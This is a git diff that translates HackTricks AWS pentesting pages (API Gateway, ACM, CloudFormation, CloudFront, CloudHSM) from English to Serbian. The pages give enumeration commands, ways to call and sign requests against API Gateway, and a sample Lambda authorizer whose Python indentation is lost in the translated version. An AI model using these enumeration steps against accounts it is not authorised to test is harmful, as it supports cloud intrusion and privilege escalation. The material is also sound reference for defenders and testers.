-- The service itself runs on **separate infrastructure instances**, such as EC2.
-- **AWS** is responsible for **managing the operating system and the platform**.
-- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**.
-- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
-- Also, platform-level identity and access management where it exists.
-- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
+- Sama usluga se pokreće na **odvojenim infrastrukturnim instancama**, kao što je EC2.
+- **AWS** je odgovoran za **upravljanje operativnim sistemom i platformom**.
+- Upravljačka usluga se pruža od strane AWS-a, koja je obično sama usluga za **stvarnu aplikaciju koja se vidi kao kontejneri**.
+- Kao korisnik ovih usluga kontejnera, imate niz odgovornosti u vezi sa upravljanjem i bezbednošću, uključujući **upravljanje bezbednošću pristupa mreži, kao što su pravila liste kontrole pristupa mreži i svi vatrozidi**.
+- Takođe, upravljanje identitetom i pristupom na nivou platforme gde to postoji.
+- **Primeri** AWS usluga kontejnera uključuju Relational Database Service, Elastic Mapreduce i Elastic Beanstalk.
 
-### Abstract Services
+### Apstraktne usluge
 
-- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
-- The services are accessed via endpoints using AWS application programming interfaces, APIs.
-- The **underlying infrastructure, operating system, and platform is managed by AWS**.
-- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
-- **Data is isolated via security mechanisms**.
-- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
+- Ove usluge su **uklonjene, apstrahovane, sa platforme ili sloja upravljanja na kojem su izgrađene cloud aplikacije**.
+- Usluge se pristupaju putem krajnjih tačaka koristeći AWS aplikacione programske interfejse, API-je.
+- **Osnovna infrastruktura, operativni sistem i platforma se upravljaju od strane AWS-a**.
+- Apstrahovane usluge pružaju platformu sa višekratnim korišćenjem na kojoj je osnovna infrastruktura deljena.
+- **Podaci su izolovani putem bezbednosnih mehanizama**.
+- Apstraktne usluge imaju jaku integraciju sa IAM, a **primeri** apstraktnih usluga uključuju S3, DynamoDB, Amazon Glacier i SQS.
 
-## Services Enumeration
+## Enumeracija usluga
 
-**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.**
+**Stranice ovog odeljka su poređane po AWS usluzi. Tamo ćete moći da pronađete informacije o usluzi (kako funkcioniše i mogućnosti) koje će vam omogućiti da eskalirate privilegije.**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
index 09aa42d7c..db2a5b97b 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md
@@ -4,40 +4,39 @@
 
 ## API Gateway
 
-### Basic Information
+### Osnovne informacije
 
-AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application.
+AWS API Gateway je sveobuhvatna usluga koju nudi Amazon Web Services (AWS) dizajnirana za programere da **kreiraju, objavljuju i nadgledaju API-je na velikoj skali**. Funkcioniše kao ulazna tačka za aplikaciju, omogućavajući programerima da uspostave okvir pravila i procedura. Ovaj okvir reguliše pristup spoljnim korisnicima određenim podacima ili funkcionalnostima unutar aplikacije.
 
-API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications.
+API Gateway vam omogućava da definišete **kako bi zahtevi za vaše API-je trebali biti obrađeni**, i može kreirati prilagođene API krajnje tačke sa specifičnim metodama (npr., GET, POST, PUT, DELETE) i resursima. Takođe može generisati klijentske SDK-ove (Softverske razvojne kompleti) kako bi olakšao programerima pozivanje vaših API-ja iz njihovih aplikacija.
 
-### API Gateways Types
+### Tipovi API Gateway-a
 
-- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends.
-- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services.
-- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services.
-- **REST API Private**: Create a REST API that is only accessible from within a VPC.
+- **HTTP API**: Kreirajte API-je sa niskom latencijom i troškovno efikasne REST API-je sa ugrađenim funkcijama kao što su OIDC i OAuth2, i podrškom za CORS. Radi sa sledećim: Lambda, HTTP pozadinskim servisima.
+- **WebSocket API**: Kreirajte WebSocket API koristeći trajne veze za slučajeve korišćenja u realnom vremenu kao što su chat aplikacije ili kontrolne table. Radi sa sledećim: Lambda, HTTP, AWS uslugama.
+- **REST API**: Razvijajte REST API gde dobijate potpunu kontrolu nad zahtevom i odgovorom zajedno sa mogućnostima upravljanja API-jem. Radi sa sledećim: Lambda, HTTP, AWS uslugama.
+- **REST API Privatni**: Kreirajte REST API koji je dostupan samo iz VPC-a.
 
-### API Gateway Main Components
+### Glavne komponente API Gateway-a
 
-1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}.
-2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage.
-   - The stage is indicated at the beggining of the URL of the API Gateway endpoint.
-3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**.
-4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API.
-   - In order to make effect the API needs to be **deployed again after** the resource policy is modified.
+1. **Resursi**: U API Gateway-u, resursi su komponente koje **čine strukturu vašeg API-ja**. Oni predstavljaju **različite putanje ili krajnje tačke** vašeg API-ja i odgovaraju raznim akcijama koje vaš API podržava. Resurs je svaka metoda (npr., GET, POST, PUT, DELETE) **unutar svake putanje** (/, ili /users, ili /user/{id}).
+2. **Faze**: Faze u API Gateway-u predstavljaju **različite verzije ili okruženja** vašeg API-ja, kao što su razvoj, testiranje ili produkcija. Možete koristiti faze za upravljanje i implementaciju **više verzija vašeg API-ja istovremeno**, omogućavajući vam da testirate nove funkcije ili ispravke grešaka bez uticaja na produkciono okruženje. Faze takođe **podržavaju varijable faze**, koje su parovi ključ-vrednost koji se mogu koristiti za konfiguraciju ponašanja vašeg API-ja na osnovu trenutne faze. Na primer, mogli biste koristiti varijable faze da usmerite API zahteve na različite Lambda funkcije ili druge pozadinske usluge u zavisnosti od faze.
+- Faza se označava na početku URL-a krajnje tačke API Gateway-a.
+3. **Autorizatori**: Autorizatori u API Gateway-u su odgovorni za **kontrolu pristupa vašem API-ju** verifikovanjem identiteta pozivaoca pre nego što dozvole da zahtev nastavi. Možete koristiti **AWS Lambda funkcije** kao prilagođene autorizatore, što vam omogućava da implementirate sopstvenu logiku autentifikacije i autorizacije. Kada zahtev stigne, API Gateway prosleđuje autorizacioni token zahteva Lambda autorizatoru, koji obrađuje token i vraća IAM politiku koja određuje koje akcije pozivalac može da izvrši. API Gateway takođe podržava **ugrađene autorizatore**, kao što su **AWS Identity and Access Management (IAM)** i **Amazon Cognito**.
+4. **Politika resursa**: Politika resursa u API Gateway-u je JSON dokument koji **definiše dozvole za pristup vašem API-ju**. Slična je IAM politici, ali je specifično prilagođena za API Gateway. Možete koristiti politiku resursa da kontrolišete ko može pristupiti vašem API-ju, koje metode mogu pozvati, i sa kojih IP adresa ili VPC-a se mogu povezati. **Politike resursa se mogu koristiti u kombinaciji sa autorizatorima** kako bi se obezbedila precizna kontrola pristupa za vaš API.
+- Da bi politika imala efekat, API mora biti **ponovo implementiran nakon** što je politika resursa izmenjena.
 
-### Logging
+### Logovanje
 
-By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**.
+Podrazumevano, **CloudWatch Logs** su **isključeni**, **Logovanje pristupa** je **isključeno**, i **X-Ray praćenje** je takođe **isključeno**.
 
-### Enumeration
+### Enumeracija
 
 > [!TIP]
-> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.**
+> Imajte na umu da su za enumeraciju resursa u oba AWS API-ja (**`apigateway`** i **`apigatewayv2`**) jedina dozvola koja vam je potrebna i jedina dozvola za čitanje koja se može dodeliti **`apigateway:GET`**, sa tim možete **enumerisati sve.**
 
 {{#tabs }}
 {{#tab name="apigateway" }}
-
 ```bash
 # Generic info
 aws apigateway get-account
@@ -78,11 +77,9 @@ aws apigateway get-usage-plan-key --usage-plan-id  --key-id 
 ###Already consumed
 aws apigateway get-usage --usage-plan-id  --start-date 2023-07-01 --end-date 2023-07-12
 ```
-
 {{#endtab }}
 
 {{#tab name="apigatewayv2" }}
-
 ```bash
 # Generic info
 aws apigatewayv2 get-domain-names
@@ -124,49 +121,43 @@ aws apigatewayv2 get-models --api-id 
 ## Call API
 https://.execute-api..amazonaws.com//
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-## Different Authorizations to access API Gateway endpoints
+## Različite autorizacije za pristup API Gateway krajnjim tačkama
 
-### Resource Policy
+### Politika resursa
 
-It's possible to use resource policies to define who could call the API endpoints.\
-In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET.
+Moguće je koristiti politike resursa da definišete ko može da poziva API krajnje tačke.\
+U sledećem primeru možete videti da **naznačena IP adresa ne može da pozove** krajnju tačku `/resource_policy` putem GET.
 
 

 
-### IAM Authorizer
+### IAM autorizator
 
-It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it.
+Moguće je postaviti da metode unutar putanje (resursa) zahtevaju IAM autentifikaciju za pozivanje.
 
 

 
-When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization.
-
-One easy way to generate the expected token by the application is to use **curl**.
+Kada je ovo postavljeno, dobićete grešku `{"message":"Missing Authentication Token"}` kada pokušate da dođete do krajnje tačke bez ikakve autorizacije.
 
+Jedan jednostavan način da generišete očekivani token od strane aplikacije je korišćenje **curl**.
 ```bash
 $ curl -X  https://.execute-api..amazonaws.com// --user : --aws-sigv4 "aws:amz::execute-api"
 ```
-
-Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**.
+Drugi način je da se koristi **`Authorization`** tip **`AWS Signature`** unutar **Postman**.
 
 

 
-Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint.
-
-Both methods will generate an **Authorization** **header** such as:
+Postavite accessKey i SecretKey naloga koji želite da koristite i možete se autentifikovati protiv API krajnje tačke.
 
+Obe metode će generisati **Authorization** **header** kao što je:
 ```
 AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2
 ```
+Napomena da u drugim slučajevima **Authorizer** možda nije **dobro kodiran** i jednostavno slanje **bilo čega** unutar **Authorization header** će **omogućiti da se vidi skriveni sadržaj**.
 
-Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**.
-
-### Request Signing Using Python
-
+### Potpisivanje zahteva koristeći Python
 ```python
 
 pip install requests
@@ -193,86 +184,83 @@ response = requests.get(url, auth=awsauth)
 print(response.text)
 
 ```
-
 ### Custom Lambda Authorizer
 
-It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\
-You can set each resource method that will be using the authoriser.
+Moguće je koristiti lambda funkciju koja na osnovu datog tokena će **vratiti IAM politiku** koja ukazuje da li je korisnik **ovlašćen da pozove API krajnju tačku**.\
+Možete postaviti svaku metodu resursa koja će koristiti autorizator.
 
 

 
-Lambda Authorizer Code Example
-
+Primer koda Lambda autorizatora
 ```python
 import json
 
 def lambda_handler(event, context):
-    token = event['authorizationToken']
-    method_arn = event['methodArn']
+token = event['authorizationToken']
+method_arn = event['methodArn']
 
-    if not token:
-        return {
-            'statusCode': 401,
-            'body': 'Unauthorized'
-        }
+if not token:
+return {
+'statusCode': 401,
+'body': 'Unauthorized'
+}
 
-    try:
-        # Replace this with your own token validation logic
-        if token == "your-secret-token":
-            return generate_policy('user', 'Allow', method_arn)
-        else:
-            return generate_policy('user', 'Deny', method_arn)
-    except Exception as e:
-        print(e)
-        return {
-            'statusCode': 500,
-            'body': 'Internal Server Error'
-        }
+try:
+# Replace this with your own token validation logic
+if token == "your-secret-token":
+return generate_policy('user', 'Allow', method_arn)
+else:
+return generate_policy('user', 'Deny', method_arn)
+except Exception as e:
+print(e)
+return {
+'statusCode': 500,
+'body': 'Internal Server Error'
+}
 
 def generate_policy(principal_id, effect, resource):
-    policy = {
-        'principalId': principal_id,
-        'policyDocument': {
-            'Version': '2012-10-17',
-            'Statement': [
-                {
-                    'Action': 'execute-api:Invoke',
-                    'Effect': effect,
-                    'Resource': resource
-                }
-            ]
-        }
-    }
-    return policy
+policy = {
+'principalId': principal_id,
+'policyDocument': {
+'Version': '2012-10-17',
+'Statement': [
+{
+'Action': 'execute-api:Invoke',
+'Effect': effect,
+'Resource': resource
+}
+]
+}
+}
+return policy
 ```
-
 

 
-Call it with something like:
+Pozovite ga sa nečim poput:
 
 
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
 

 
 > [!WARNING]
-> Depending on the Lambda code, this authorization might be vulnerable
+> U zavisnosti od Lambda koda, ova autorizacija može biti ranjiva
 
-Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}`
+Imajte na umu da ako se **generiše i vrati politika odbijanja**, greška koju vraća API Gateway je: `{"Message":"User is not authorized to access this resource with an explicit deny"}`
 
-This way you could **identify this authorization** being in place.
+Na ovaj način možete **identifikovati ovu autorizaciju** koja je na snazi.
 
-### Required API Key
+### Potreban API ključ
 
-It's possible to set API endpoints that **require a valid API key** to contact it.
+Moguće je postaviti API krajnje tačke koje **zahtevaju važeći API ključ** za kontakt.
 
 

 
-It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month).
+Moguće je generisati API ključeve u API Gateway portalu i čak postaviti koliko često mogu biti korišćeni (u smislu zahteva po sekundi i u smislu zahteva po mesecu).
 
-To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key:
+Da bi API ključ radio, potrebno je dodati ga u **Plan korišćenja**, ovaj plan korišćenja mora biti dodat u **API fazu** i povezana API faza treba da ima konfigurisano **ograničenje metoda** za **krajnju tačku** koja zahteva API ključ:
 
 

 
-## Unauthenticated Access
+## Neautorizovani pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
@@ -284,20 +272,16 @@ To make an API key work, you need to add it to a **Usage Plan**, this usage plan
 ../aws-privilege-escalation/aws-apigateway-privesc.md
 {{#endref}}
 
-## Post Exploitation
+## Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-api-gateway-post-exploitation.md
 {{#endref}}
 
-## Persistence
+## Postojanost
 
 {{#ref}}
 ../aws-persistence/aws-api-gateway-persistence.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
index 0f3da9d50..856d5728f 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
@@ -2,18 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**.
+**AWS Certificate Manager (ACM)** se pruža kao usluga koja ima za cilj pojednostavljenje **provisioning-a, upravljanja i implementacije SSL/TLS sertifikata** za AWS usluge i interne resurse. Potreba za ručnim procesima, kao što su kupovina, otpremanje i obnavljanje sertifikata, je **eliminisana** od strane ACM-a. Ovo omogućava korisnicima da efikasno traže i implementiraju sertifikate na raznim AWS resursima uključujući **Elastic Load Balancers, Amazon CloudFront distribucije i API-e na API Gateway-u**.
 
-A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services.
+Ključna karakteristika ACM-a je **automatsko obnavljanje sertifikata**, što značajno smanjuje troškove upravljanja. Pored toga, ACM podržava kreiranje i centralizovano upravljanje **privatnim sertifikatima za internu upotrebu**. Iako se SSL/TLS sertifikati za integrisane AWS usluge kao što su Elastic Load Balancing, Amazon CloudFront i Amazon API Gateway pružaju bez dodatnih troškova putem ACM-a, korisnici su odgovorni za troškove povezane sa AWS resursima koje koriste njihove aplikacije i mesečnu naknadu za svaku **privatnu Certificate Authority (CA)** i privatne sertifikate korišćene van integrisanih ACM usluga.
 
-**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization.
+**AWS Private Certificate Authority** se nudi kao **upravljana privatna CA usluga**, poboljšavajući mogućnosti ACM-a proširujući upravljanje sertifikatima da uključuje privatne sertifikate. Ovi privatni sertifikati su ključni za autentifikaciju resursa unutar organizacije.
 
-## Enumeration
+## Enumeracija
 
 ### ACM
-
 ```bash
 # List certificates
 aws acm list-certificates
@@ -27,9 +26,7 @@ aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:ce
 # Account configuration
 aws acm get-account-configuration
 ```
-
 ### PCM
-
 ```bash
 # List CAs
 aws acm-pca list-certificate-authorities
@@ -49,7 +46,6 @@ aws acm-pca get-certificate-authority-csr --certificate-authority-arn 
 # Get CA Policy (if any)
 aws acm-pca get-policy --resource-arn 
 ```
-
 ## Privesc
 
 TODO
@@ -59,7 +55,3 @@ TODO
 TODO
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
index 66539b87d..0037578f2 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
@@ -4,10 +4,9 @@
 
 ## CloudFormation
 
-AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.
+AWS CloudFormation je usluga dizajnirana da **pojednostavi upravljanje AWS resursima**. Omogućava korisnicima da se više fokusiraju na svoje aplikacije koje rade u AWS-u tako što **minimizuje vreme provedeno na upravljanju resursima**. Osnovna karakteristika ove usluge je **šablon**—opisni model željenih AWS resursa. Kada se ovaj šablon obezbedi, CloudFormation je odgovoran za **provisioning i konfiguraciju** specificiranih resursa. Ova automatizacija olakšava efikasnije i bezgrešno upravljanje AWS infrastrukturom.
 
 ### Enumeration
-
 ```bash
 # Stacks
 aws cloudformation list-stacks
@@ -30,10 +29,9 @@ aws cloudformation list-stack-instances --stack-set-name 
 aws cloudformation list-stack-set-operations --stack-set-name 
 aws cloudformation list-stack-set-operation-results --stack-set-name  --operation-id 
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse cloudformation permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite cloudformation dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-cloudformation-privesc/
@@ -41,14 +39,13 @@ In the following page you can check how to **abuse cloudformation permissions to
 
 ### Post-Exploitation
 
-Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation
+Proverite za **tajne** ili osetljive informacije u **šablonu, parametrima i izlazu** svake CloudFormation
 
 ## Codestar
 
-AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members).
+AWS CodeStar je usluga za kreiranje, upravljanje i rad sa projektima razvoja softvera na AWS-u. Možete brzo razvijati, graditi i implementirati aplikacije na AWS-u sa AWS CodeStar projektom. AWS CodeStar projekat kreira i **integriše AWS usluge** za vaš alat za razvoj projekta. U zavisnosti od vašeg izbora šablona AWS CodeStar projekta, taj alat može uključivati kontrolu verzija, izgradnju, implementaciju, virtuelne servere ili resurse bez servera, i još mnogo toga. AWS CodeStar takođe **upravlja dozvolama potrebnim za korisnike projekta** (koji se nazivaju članovi tima).
 
 ### Enumeration
-
 ```bash
 # Get projects information
 aws codestar list-projects
@@ -56,13 +53,12 @@ aws codestar describe-project --id 
 aws codestar list-resources --project-id 
 aws codestar list-team-members --project-id 
 
- aws codestar list-user-profiles
- aws codestar describe-user-profile --user-arn 
+aws codestar list-user-profiles
+aws codestar describe-user-profile --user-arn 
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse codestar permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite codestar dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-codestar-privesc/
@@ -73,7 +69,3 @@ In the following page you can check how to **abuse codestar permissions to escal
 - [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
index 75613cdb4..ecd37fadb 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
@@ -4,20 +4,19 @@
 
 ## CloudFront
 
-CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
+CloudFront je AWS-ova **mreža za isporuku sadržaja koja ubrzava distribuciju** vašeg statičkog i dinamičkog sadržaja putem svoje svetske mreže ivica. Kada koristite zahtev za sadržajem koji hostujete putem Amazon CloudFront-a, zahtev se usmerava na najbližu ivicu koja pruža najnižu latenciju za najbolju performansu. Kada su **CloudFront pristupni logovi** omogućeni, možete zabeležiti zahtev svakog korisnika koji traži pristup vašem veb sajtu i distribuciji. Kao i kod S3 pristupnih logova, ovi logovi su takođe **smešteni na Amazon S3 za trajno i postojano skladištenje**. Nema troškova za omogućavanje logovanja, međutim, pošto su logovi smešteni u S3, bićete naplaćeni za skladištenje koje koristi S3.
 
-The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
+Log fajlovi beleže podatke tokom određenog vremenskog perioda i zavisno od broja zahteva koje Amazon CloudFront primi za tu distribuciju, zavisiće i broj generisanih log fajlova. Važno je znati da se ovi log fajlovi ne kreiraju ili ne pišu na S3. S3 je jednostavno mesto gde se isporučuju kada je log fajl pun. **Amazon CloudFront zadržava ove logove dok nisu spremni za isporuku na S3**. Ponovo, u zavisnosti od veličine ovih log fajlova, ova isporuka može trajati **između jednog i 24 sata**.
 
-**By default cookie logging is disabled** but you can enable it.
+**Po defaultu, logovanje kolačića je onemogućeno** ali ga možete omogućiti.
 
 ### Functions
 
-You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
+Možete kreirati funkcije u CloudFront-u. Ove funkcije će imati svoj **endpoint u cloudfront-u** definisan i izvršiće deklarisani **NodeJS kod**. Ovaj kod će se izvršavati unutar **sandbox-a** na mašini koja radi pod AWS upravljanom mašinom (biće vam potrebna zaobilaženje sandbox-a da biste uspeli da pobegnete u osnovni OS).
 
-As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature.
+Pošto se funkcije ne izvršavaju u korisnikovom AWS nalogu, nijedna IAM uloga nije povezana, tako da nije moguće direktno privilegije eskalirati zloupotrebom ove funkcije.
 
 ### Enumeration
-
 ```bash
 aws cloudfront list-distributions
 aws cloudfront get-distribution --id  # Just get 1
@@ -28,21 +27,16 @@ aws cloudfront get-function --name TestFunction function_code.js
 
 aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME"
 ```
-
-## Unauthenticated Access
+## Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
 {{#endref}}
 
-## Post Exploitation
+## Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-cloudfront-post-exploitation.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
index 55216fa7e..c9e7ebfb7 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
@@ -4,68 +4,62 @@
 
 ## HSM - Hardware Security Module
 
-Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
+Cloud HSM je FIPS 140 nivo dva validirani **hardverski uređaj** za sigurno skladištenje kriptografskih ključeva (napomena: CloudHSM je hardverski uređaj, nije virtuelizovana usluga). To je SafeNetLuna 7000 uređaj sa preinstaliranim verzijom 5.3.13. Postoje dve verzije firmvera i koja ćete izabrati zavisi od vaših tačnih potreba. Jedna je za usklađenost sa FIPS 140-2, a postoji i novija verzija koja se može koristiti.
 
-The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads
+Neobična karakteristika CloudHSM-a je to što je fizički uređaj, i stoga **nije deljen sa drugim korisnicima**, ili kako se to obično naziva, multi-tenant. To je posvećen uređaj koji je isključivo dostupan vašim radnim opterećenjima.
 
-Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be.
+Obično, uređaj je dostupan u roku od 15 minuta pod pretpostavkom da postoji kapacitet, ali u nekim zonama to možda neće biti slučaj.
 
-Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.
